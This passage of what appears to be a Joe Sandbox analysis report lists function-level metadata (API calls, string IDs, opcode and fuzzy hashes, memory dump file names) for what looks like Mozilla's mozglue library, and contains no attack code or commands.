                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C0AD019,?,?,?,?,?,00000000,?,6C09DA31,00100000,?), ref: 6C08FFD3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,6C0AD019,?,?,?,?,?,00000000,?,6C09DA31,00100000,?,?), ref: 6C08FFF5
                                                                  • free.MOZGLUE(?,?,?,?,?,6C0AD019,?,?,?,?,?,00000000,?,6C09DA31,00100000,?), ref: 6C09001B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C0AD019,?,?,?,?,?,00000000,?,6C09DA31,00100000,?,?), ref: 6C09002A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 826125452-0
                                                                  • Opcode ID: 6244a2884c35350b7d52597a4133daf6a51bc0bf89ab8ea4dad759f840e05aac
                                                                  • Instruction ID: e90f20bf5352bfe80c76a7de0130f3e830791bb744c3f24654c08fed54519598
                                                                  • Opcode Fuzzy Hash: 6244a2884c35350b7d52597a4133daf6a51bc0bf89ab8ea4dad759f840e05aac
                                                                  • Instruction Fuzzy Hash: 0D21D6B2B002255BCB189E78DC949AFB7FAFBC93247254338E425D7781EB70AD0186D1
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C0A22EF
                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0A233B
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C0A2354
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3510742995-2178588373
                                                                  • Opcode ID: e7a8daafa2bd06f7ecff014570dec3d320dd63f89de1ed7d730489ad50a56b0f
                                                                  • Instruction ID: 4f14e19c88598b2f9f69e43294034102d640c58b43f160e88f6b11144ca41024
                                                                  • Opcode Fuzzy Hash: e7a8daafa2bd06f7ecff014570dec3d320dd63f89de1ed7d730489ad50a56b0f
                                                                  • Instruction Fuzzy Hash: 5E210A71A006099FCB14DF65DC94EAFB7F9EF86714B10462DF5255BB40DB307845C6A0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID:
                                                                  • API String ID: 3732870572-0
                                                                  • Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                  • Instruction ID: 29b127d0dbddc2543bafd9b7ea2bbd70f5defd1eabbc28ab220771beb42c3f35
                                                                  • Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                  • Instruction Fuzzy Hash: B6215171B006095FD714DF6DDC81FA777F8EB85714B10863EE11AD7740E674A8048BA0
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C06B4F5
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C06B502
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C06B542
                                                                  • free.MOZGLUE(?), ref: 6C06B578
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 61697ecb79ec21640eb1cc244891f8bc0a6f6be90049a664bdb7fdd2250c43b9
                                                                  • Instruction ID: c58d589914b985c4ef0cf93efea5f135db1e6f10dd3466555455ba804b384b50
                                                                  • Opcode Fuzzy Hash: 61697ecb79ec21640eb1cc244891f8bc0a6f6be90049a664bdb7fdd2250c43b9
                                                                  • Instruction Fuzzy Hash: A911D970A04B41C7D7228F2AC8007A6B3F4FF9A319F14970AEC4963E02EBB0B1C48790
                                                                  APIs
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C05F20E,?), ref: 6C093DF5
                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C05F20E,00000000,?), ref: 6C093DFC
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C093E06
                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C093E0E
                                                                    • Part of subcall function 6C08CC00: GetCurrentProcess.KERNEL32(?,?,6C0531A7), ref: 6C08CC0D
                                                                    • Part of subcall function 6C08CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0531A7), ref: 6C08CC16
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                  • String ID:
                                                                  • API String ID: 2787204188-0
                                                                  • Opcode ID: 73b8a7106f7095d44471c6f88f32d85d232bc0f1ee8ce1f74d18d63bcc4e7415
                                                                  • Instruction ID: d63876bcc72f44615c6b9467936f279e49539833d82d114329e7d3bb6225168c
                                                                  • Opcode Fuzzy Hash: 73b8a7106f7095d44471c6f88f32d85d232bc0f1ee8ce1f74d18d63bcc4e7415
                                                                  • Instruction Fuzzy Hash: 6AF012716002187BDB00AB54DC81EAB377DDF46628F044024FE0857741DA35BE5596F7
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A205B
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C0A201B,?,?,?,?,?,?,?,6C0A1F8F,?,?), ref: 6C0A2064
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0A208E
                                                                  • free.MOZGLUE(?,?,?,00000000,?,6C0A201B,?,?,?,?,?,?,?,6C0A1F8F,?,?), ref: 6C0A20A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 0e837bfb86e0aa54e9de617ca1f4101a18fe13d187c1d0a7fbe254e02f25297f
                                                                  • Instruction ID: bc8b6b5cf231befdb89f7d175eaced37bb382dd20b2348d408daffdbccea9601
                                                                  • Opcode Fuzzy Hash: 0e837bfb86e0aa54e9de617ca1f4101a18fe13d187c1d0a7fbe254e02f25297f
                                                                  • Instruction Fuzzy Hash: 81F0E9B51007009BC7219F57D888B5BB7F9EF8A324F10012AF94A87712DB71F806CB96
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EB11
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EB1E
                                                                  • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C09EB3C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EB5B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EBA4
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C09EBAC
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EBC1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000), ref: 6C09EBCE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C09EBE5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8,00000000), ref: 6C09EC37
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C09EC46
                                                                  • CloseHandle.KERNEL32(?), ref: 6C09EC55
                                                                  • free.MOZGLUE(00000000), ref: 6C09EC5C
                                                                  Strings
                                                                  • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C09EA9B
                                                                  • 3JT/, xrefs: 6C09E8BE
                                                                  • [I %d/%d] profiler_start, xrefs: 6C09EBB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
                                                                  • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start$3JT/
                                                                  • API String ID: 2885072826-3585140985
                                                                  • Opcode ID: e74254ceae7c79456becf8fcd0259bf6984a56bc790a9a52a084441bb17f5250
                                                                  • Instruction ID: 9b7c2578d0596b93b3b3b94564c87e2e7219c00a1451492253bb427c0cc9efbc
                                                                  • Opcode Fuzzy Hash: e74254ceae7c79456becf8fcd0259bf6984a56bc790a9a52a084441bb17f5250
                                                                  • Instruction Fuzzy Hash: 74F0A7313003109BDB005F59DC04B9577F8AB82656F14C029FD06D3740DF74B845C7A9
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A20B7
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C08FBD1), ref: 6C0A20C0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C08FBD1), ref: 6C0A20DA
                                                                  • free.MOZGLUE(00000000,?,6C08FBD1), ref: 6C0A20F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: 90cf539a1d5510e2c1fee8b03fcfacd0f3f4c83d37b426823c054b1d8e383fff
                                                                  • Instruction ID: 2f6419ce704f59fd2d7d4febc93a80ae49dc51ef87ae8e005d6d28e2d13b2884
                                                                  • Opcode Fuzzy Hash: 90cf539a1d5510e2c1fee8b03fcfacd0f3f4c83d37b426823c054b1d8e383fff
                                                                  • Instruction Fuzzy Hash: FFE0E5316006158BC6209F669808A8EB7F9EF86214B11062AE80AC3B02EB75F54686D6
                                                                  APIs
                                                                  • free.MOZGLUE(?), ref: 6C0A0475
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A05C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcess$TerminateThreadfree
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1378537744-2178588373
                                                                  • Opcode ID: d6e61739b2f718ea885f6827bb318503ffe20495a76146a7c4b13ab23b5c3f03
                                                                  • Instruction ID: 7ea4c269b87a13a8dd758457346dbd4d12f18d7f51452eafadf11e3d91c92f60
                                                                  • Opcode Fuzzy Hash: d6e61739b2f718ea885f6827bb318503ffe20495a76146a7c4b13ab23b5c3f03
                                                                  • Instruction Fuzzy Hash: C6817970208645CFC708DF98C484BA9B3F5FB89708F648929D95A8BB52CB31F856CB91
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?), ref: 6C0AEC37
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Now@Stamp@mozilla@@TimeV12@_
                                                                  • String ID: l$3JT/
                                                                  • API String ID: 2230303159-2972850575
                                                                  • Opcode ID: 76273be9af90c22d875550bb0bbc0760c1310669a5eb338d7b92a14c02960d33
                                                                  • Instruction ID: 00e610868d23e1ee59a9cd62165c626dd363e138e11fb33403a18f801fdc69de
                                                                  • Opcode Fuzzy Hash: 76273be9af90c22d875550bb0bbc0760c1310669a5eb338d7b92a14c02960d33
                                                                  • Instruction Fuzzy Hash: F1A18D75A087419FC704CFA8C49074AFBF1BF89318F54891EE8A987752D770E999CB82
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C0A85D3
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C0A8725
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 3720097785-1285458680
                                                                  • Opcode ID: d2e7d719126665aeb383a848bc30ba3403325761b4b3fa79905609c52c868119
                                                                  • Instruction ID: 211b61b5a6707ee88154974dc33c96ad02f0b56e5e35f56c8df39a21b37fc7d5
                                                                  • Opcode Fuzzy Hash: d2e7d719126665aeb383a848bc30ba3403325761b4b3fa79905609c52c868119
                                                                  • Instruction Fuzzy Hash: 13515774A046818FE701CF98C184B59BBF1BF4A318F19C29AD8595BB62C375F846CF92
                                                                  APIs
                                                                    • Part of subcall function 6C097090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C09B9F1,?), ref: 6C097107
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C09EB71), ref: 6C0957AB
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$CurrentProcessRelease$AcquireTerminateThread
                                                                  • String ID: ql$3JT/
                                                                  • API String ID: 2617131280-2594144484
                                                                  • Opcode ID: 24fe477221cf5e7430c3f8c247bbe548d80de03d134a1edf4d4d9c9630cf4e0a
                                                                  • Instruction ID: 10d03af62e56026116375a09449d8971e0ce080539a7a854ec6accd79aaf6967
                                                                  • Opcode Fuzzy Hash: 24fe477221cf5e7430c3f8c247bbe548d80de03d134a1edf4d4d9c9630cf4e0a
                                                                  • Instruction Fuzzy Hash: EF516B31E08B859BD704CF38C5813A6B7A0BF99258F14E619ED9D17253EB30BAD8C781
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footerfree
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1226231535-2178588373
                                                                  • Opcode ID: 3cd1dbf7854f9be761edc9f661115e4b179359fedb00c0596c82a8f6b26ed949
                                                                  • Instruction ID: dd2ad37a960e551aacd241ba7313143dd2bfb3e44a55c57a2fc1bf2295abb465
                                                                  • Opcode Fuzzy Hash: 3cd1dbf7854f9be761edc9f661115e4b179359fedb00c0596c82a8f6b26ed949
                                                                  • Instruction Fuzzy Hash: E441AFB19013048FCB14CF58D488B9ABBF9FF4A310B1585AEC829ABB55D731B945CF91
                                                                  APIs
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0B0EFC
                                                                    • Part of subcall function 6C0A1B80: GetCurrentThreadId.KERNEL32 ref: 6C0A1B98
                                                                    • Part of subcall function 6C0A1B80: AcquireSRWLockExclusive.KERNEL32(?,?,6C0A1D96,00000000), ref: 6C0A1BA1
                                                                    • Part of subcall function 6C0A1B80: ReleaseSRWLockExclusive.KERNEL32(?,?,6C0A1D96,00000000), ref: 6C0A1BB5
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 6C0B0E50
                                                                    • Part of subcall function 6C075B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0756EE,?,00000001), ref: 6C075B85
                                                                    • Part of subcall function 6C075B50: EnterCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075B90
                                                                    • Part of subcall function 6C075B50: LeaveCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075BD8
                                                                    • Part of subcall function 6C075B50: GetTickCount64.KERNEL32 ref: 6C075BE4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCriticalCurrentReleaseSectionThread$Count64CounterEnterLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2508600278-2178588373
                                                                  • Opcode ID: b18d3c3fb9f413918a6ae07ce2bbe30291e05acac1082cdf4fc1d6cc7191107e
                                                                  • Instruction ID: 8f185008d4482d37ac0efeffcd1b2fff648165f570273ef94c25eac87ff99ace
                                                                  • Opcode Fuzzy Hash: b18d3c3fb9f413918a6ae07ce2bbe30291e05acac1082cdf4fc1d6cc7191107e
                                                                  • Instruction Fuzzy Hash: 384166B56087429FCB08CF29C580A5AB7F5BF88318F40491DE999A7B41DB31F809CB91
                                                                  APIs
                                                                  • fgetpos.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C0AC605
                                                                  • _fseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000001), ref: 6C0AC672
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _fseeki64fgetpos
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3401907645-2178588373
                                                                  • Opcode ID: e5a7ec45871d6a75f3e03f994ec31cbe4689440d75fa9c2d0b5eb4684a557983
                                                                  • Instruction ID: 60cd5584408b07f16f302537a12539ca37b1396c02507645d7584de9e53cd005
                                                                  • Opcode Fuzzy Hash: e5a7ec45871d6a75f3e03f994ec31cbe4689440d75fa9c2d0b5eb4684a557983
                                                                  • Instruction Fuzzy Hash: 82416B71604705DFCB04DF69C840A5ABBF5FF88318B018A2EE84A87B51EB31F955CB91
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C059B2C
                                                                  • memcpy.VCRUNTIME140(6C0599CF,00000000,?), ref: 6C059BB6
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C059BF8
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C059DE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
